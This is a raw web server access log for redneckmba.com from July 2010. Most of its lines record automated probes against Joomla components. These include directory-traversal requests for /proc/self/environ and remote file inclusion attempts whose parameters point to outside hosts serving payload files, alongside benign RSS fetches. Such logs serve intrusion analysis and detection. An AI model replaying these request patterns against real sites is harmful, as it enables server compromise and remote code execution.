202.47.80.12 - - [22/Jul/2010:00:17:01 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [22/Jul/2010:00:17:02 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.107 - - [22/Jul/2010:00:27:36 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [22/Jul/2010:00:29:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [22/Jul/2010:00:31:46 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:44:05 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:44:11 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:44:11 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:47:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:47:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:47:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:47:35 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:47:35 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:47:35 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
219.94.128.174 - - [22/Jul/2010:00:47:44 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:00:49:14 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:52:17 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:52:17 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:52:17 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.123.194 - - [22/Jul/2010:00:52:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:52:39 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:52:39 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:00:52:39 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
219.94.128.174 - - [22/Jul/2010:00:52:59 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
62.44.82.118 - - [22/Jul/2010:00:57:56 -0700] "GET /logs//?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1944 "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.118 - - [22/Jul/2010:00:57:57 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.105 - - [22/Jul/2010:00:58:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [22/Jul/2010:01:00:52 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:02:45 -0700] "GET /logs/access_100607.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:02:45 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:02:45 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
219.94.128.174 - - [22/Jul/2010:01:03:35 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
219.94.128.174 - - [22/Jul/2010:01:03:36 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
219.94.128.174 - - [22/Jul/2010:01:03:36 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:06:23 -0700] "GET /logs/access_100607.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:06:23 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:06:24 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
89.108.64.192 - - [22/Jul/2010:01:09:04 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:01:09:04 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [22/Jul/2010:01:09:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
66.163.171.206 - - [22/Jul/2010:01:09:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:11:54 -0700] "GET /logs/access_100607.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:11:55 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
209.34.196.162 - - [22/Jul/2010:01:11:55 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
76.13.114.105 - - [22/Jul/2010:01:36:17 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
119.192.156.87 - - [22/Jul/2010:01:42:11 -0700] "GET /send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.156.87 - - [22/Jul/2010:01:42:12 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.156.87 - - [22/Jul/2010:01:42:12 -0700] "GET /logs/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.156.87 - - [22/Jul/2010:01:42:12 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.156.87 - - [22/Jul/2010:01:42:13 -0700] "GET /send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.156.87 - - [22/Jul/2010:01:42:13 -0700] "GET /logs/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [22/Jul/2010:01:43:26 -0700] "GET /logs//?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1944 "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.118 - - [22/Jul/2010:01:43:26 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
118.127.32.21 - - [22/Jul/2010:01:43:37 -0700] "GET /logs//?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1944 "-" "libwww-perl/5.823" "www.redneckmba.com"
118.127.32.21 - - [22/Jul/2010:01:43:38 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.823" "www.redneckmba.com"
125.141.91.138 - - [22/Jul/2010:01:45:00 -0700] "GET /logs/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [22/Jul/2010:01:45:01 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [22/Jul/2010:01:45:01 -0700] "GET /send_reminders.php?includedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [22/Jul/2010:01:52:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [22/Jul/2010:01:57:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.189.179.214 - - [22/Jul/2010:02:10:47 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
89.189.179.214 - - [22/Jul/2010:02:10:47 -0700] "GET /logs/access.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
89.189.179.214 - - [22/Jul/2010:02:10:47 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.105 - - [22/Jul/2010:02:10:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.189.179.214 - - [22/Jul/2010:02:22:55 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
89.189.179.214 - - [22/Jul/2010:02:22:56 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
89.189.179.214 - - [22/Jul/2010:02:22:56 -0700] "GET /logs/access.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:26:06 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:26:06 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:26:06 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:26:22 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:26:22 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:26:22 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:31:18 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:31:18 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:31:18 -0700] "GET /logs/access_100607.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:31:21 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:31:21 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.239.159.14 - - [22/Jul/2010:02:31:21 -0700] "GET /logs/access_100607.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.materiagrezza.net/wall/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.205 - - [22/Jul/2010:02:41:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [22/Jul/2010:02:43:56 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [22/Jul/2010:02:50:47 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.236.47.182 - - [22/Jul/2010:03:16:08 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:03:16:09 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:03:16:15 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:03:18:48 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:03:18:50 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:03:19:14 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.105 - - [22/Jul/2010:03:19:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [22/Jul/2010:03:25:52 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
94.23.205.159 - - [22/Jul/2010:03:32:01 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
94.23.205.159 - - [22/Jul/2010:03:32:01 -0700] "GET /logs/?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1939 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
94.23.205.159 - - [22/Jul/2010:03:32:08 -0700] "GET /?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 779 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
74.55.96.234 - - [22/Jul/2010:03:40:52 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [22/Jul/2010:03:40:52 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [22/Jul/2010:03:40:53 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [22/Jul/2010:03:42:04 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [22/Jul/2010:03:42:04 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.55.96.234 - - [22/Jul/2010:03:42:04 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [22/Jul/2010:03:45:55 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [22/Jul/2010:03:45:55 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [22/Jul/2010:03:45:55 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [22/Jul/2010:03:46:18 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [22/Jul/2010:03:46:18 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [22/Jul/2010:03:46:18 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [22/Jul/2010:03:49:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.121.58.85 - - [22/Jul/2010:03:53:34 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
89.97.199.132 - - [22/Jul/2010:03:54:25 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.69" "www.redneckmba.com"
76.13.114.105 - - [22/Jul/2010:03:55:55 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.236.47.182 - - [22/Jul/2010:04:00:08 -0700] "GET /logs/access.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:04:00:10 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
222.236.47.182 - - [22/Jul/2010:04:00:10 -0700] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
174.121.58.85 - - [22/Jul/2010:04:11:21 -0700] "GET /logs/access.log/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
174.121.58.85 - - [22/Jul/2010:04:11:21 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
174.121.58.85 - - [22/Jul/2010:04:11:21 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.831" "www.redneckmba.com"
66.163.171.207 - - [22/Jul/2010:04:11:56 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.121.58.85 - - [22/Jul/2010:04:14:23 -0700] "GET /logs/access.log/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
174.121.58.85 - - [22/Jul/2010:04:14:23 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
